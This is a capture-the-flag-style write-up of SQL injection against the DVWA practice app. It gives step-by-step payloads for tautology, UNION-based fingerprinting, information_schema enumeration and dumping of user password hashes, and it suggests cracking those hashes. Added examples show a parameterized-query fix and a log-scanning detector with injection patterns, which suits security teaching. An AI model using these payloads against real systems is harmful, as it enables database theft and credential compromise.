DVWA SQL Injection Write-up
Hello there. In this write-up I walk through one of the most famous vulnerabilities on the internet, and yes, that is SQL injection.
What is DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers/students in teaching/learning web application security in a classroom environment.
SQL Injection
So basically, SQL injection is a trick to inject SQL queries/commands as input, typically via web pages. Many web pages take parameters from the user and build a SQL query for the database from them. Take for instance a user login: the web page takes the user name and password and makes a SQL query to the database to check whether a user with that name and password exists. With SQL injection, it is possible for us to send a crafted user name and/or password field that changes the SQL query and thus grants us something else.
Injection Detail:
Vulnerability: SQL Injection
Difficulty Level: Easy
First we will see what SQL injection actually looks like in practice.
Let's power up DVWA, set the difficulty level, and begin with the following.
Input "1" into the text box and click Submit.
Note that the webpage/code is supposed to print the ID, First name, and Surname to the screen. Below is the PHP select statement that we will be exploiting, specifically the $id variable, which is inserted into the query string without any escaping or parameter binding.
// $id comes straight from the request and is interpolated into the SQL text unchanged
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Always True Scenario
Input the below text into the User ID Textbox (See Picture).
%' or '0'='0
Then click Submit.
In this scenario we are asking the database to display every record, whether the first condition is false or true. The %' part will probably not equal any user_id and is false; '0'='0' is always true, because 0 always equals 0, and since the two conditions are joined by OR the WHERE clause is true for every row. The resulting database statement is: mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
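The following is an added example (not code from the write-up or from DVWA) that reproduces the always-true scenario in a runnable form and shows the fix a developer would apply. It assumes a small constructed users table and uses SQLite as a stand-in for DVWA's MySQL backend, so only the quote/OR tautology payload is exercised (the MySQL-specific # comment and version() function are not available in SQLite). The vulnerable function mirrors the $getid string concatenation above; the parameterized function binds the input as a value, so the same payload simply matches nothing.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (not a real DVWA dump).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

# The payload from the write-up's "Always True Scenario".
ALWAYS_TRUE = "%' or '0'='0"


def make_db():
    """In-memory SQLite database; SQLite stands in for MySQL in this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def rendered_query(user_id):
    """The SQL text the vulnerable code actually sends, i.e. the write-up's $getid."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"


def lookup_vulnerable(conn, user_id):
    """Mirrors the PHP: user input is pasted into the SQL string, so quotes in the
    input become SQL syntax and can rewrite the WHERE clause."""
    return conn.execute(rendered_query(user_id)).fetchall()


def lookup_parameterized(conn, user_id):
    """The fix: the query text is fixed and the input is bound as a value.
    A quote inside the value is just a character, never SQL syntax."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def demo():
    """Run both lookups with a normal id and with the tautology payload.
    Returns (normal_results, injected_results), each keyed by implementation."""
    conn = make_db()
    normal = {
        "vulnerable": lookup_vulnerable(conn, "1"),
        "parameterized": lookup_parameterized(conn, "1"),
    }
    injected = {
        "vulnerable": lookup_vulnerable(conn, ALWAYS_TRUE),
        "parameterized": lookup_parameterized(conn, ALWAYS_TRUE),
    }
    return normal, injected


if __name__ == "__main__":
    normal, injected = demo()
    print("Query sent by vulnerable code:", rendered_query(ALWAYS_TRUE))
    print("Normal input  ->", normal)
    print("Payload input ->", injected)
```

With the normal input both implementations return the single admin row. With the payload, the vulnerable lookup returns all five rows because the WHERE clause has become `user_id = '%' or '0'='0'`, while the parameterized lookup returns nothing because no user_id equals the literal string `%' or '0'='0`.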
Display Database Version
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #
Then click Submit.
Notice in the last displayed line, 5.1.60 is displayed in the surname. This is the version of the MySQL database.
Display Database User
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notice in the last displayed line, root@localhost is displayed in the surname. This is the database user account that the PHP code uses to run its queries behind the scenes.
Display Database Name
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, database() #
Notice in the last displayed line, DVWA is displayed in the surname. This is the name of the database.
Display all table information in information_schema
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables #
Then click Submit.
Now we are displaying all the tables in the information_schema database.
The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.
Display all the user tables in information_schema
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
Then click Submit.
Now we are displaying all the tables that start with the prefix “user” in the information_schema database.
Display all the column names of the users table via information_schema
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Then click Submit.
Now we are displaying all the columns in the users table (0x0a is a newline, used to separate the table name from the column name in the output).
Notice there are user_id, first_name, last_name, user and password columns.
Display the contents of those columns in the users table
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Then click Submit.
Now we have successfully displayed all the authentication information stored in this database.
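From the defender's side, every step above leaves a trace in the web server access log, because the payload travels in the id query parameter. The following is an added example (not part of the write-up and not a DVWA component) that scans constructed Apache-style log lines for the patterns used in this walk-through: the quote/OR tautology, UNION SELECT, information_schema probing, the version()/user()/database() fingerprinting calls, and the trailing comment marker. The log lines, the signature names and the decoding approach are all assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the techniques shown in the write-up, matched against decoded
# parameter values. Names are chosen for this example.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+", re.I),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "schema_probe": re.compile(r"information_schema", re.I),
    "db_fingerprint": re.compile(r"\b(version|user|database)\s*\(\s*\)", re.I),
    "comment_trunc": re.compile(r"(#|--\s|/\*)"),
}

# Common Log Format: client, ident, user, [time], "METHOD target PROTO", status ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not from a real server). Payloads are URL-encoded
# as a browser would send them; the MySQL '#' comment appears as %23.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521',
    '10.0.0.5 - - [12/Mar/2023:10:01:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 5102',
    '10.0.0.5 - - [12/Mar/2023:10:02:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 4610',
    '10.0.0.5 - - [12/Mar/2023:10:03:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+table_name+from+information_schema.tables+%23&Submit=Submit HTTP/1.1" 200 9800',
    '10.0.0.9 - - [12/Mar/2023:10:05:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1200',
]


def inspect_request(target):
    """Decode each query parameter of a request target and return the list of
    (parameter name, signature name) hits."""
    hits = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes values and turns '+' into spaces for us.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, sig_name))
    return hits


def scan_log(lines):
    """Return one (client, target, sorted signature names) tuple per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hits = inspect_request(m.group("target"))
        if hits:
            signatures = sorted({sig for _, sig in hits})
            findings.append((m.group("client"), m.group("target"), signatures))
    return findings


if __name__ == "__main__":
    for client, target, signatures in scan_log(SAMPLE_LOG):
        print(f"{client} {', '.join(signatures):40} {target}")
```

The benign request (id=1) and the page view without parameters produce no hits, the three injected requests are each tagged with the techniques they use, and the escalation from tautology to UNION to information_schema probing is visible in order. Signature matching on decoded parameters is a useful first filter, but it is not a substitute for the fix shown earlier: parameterized queries remove the vulnerability, while this scan only tells you that someone is probing for it.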
And that's it. We have the password hashes, and they are plain MD5, which is quite easy to crack. Crack them and enjoy the ultimate user :)
This hack is performed with DVWA, which is a practice application; I won't harm any system with this hack, and I'm not responsible for any kind of hack done by you. It is for educational purposes only. B)
I hope you understand the write-up and enjoy it.
Peace...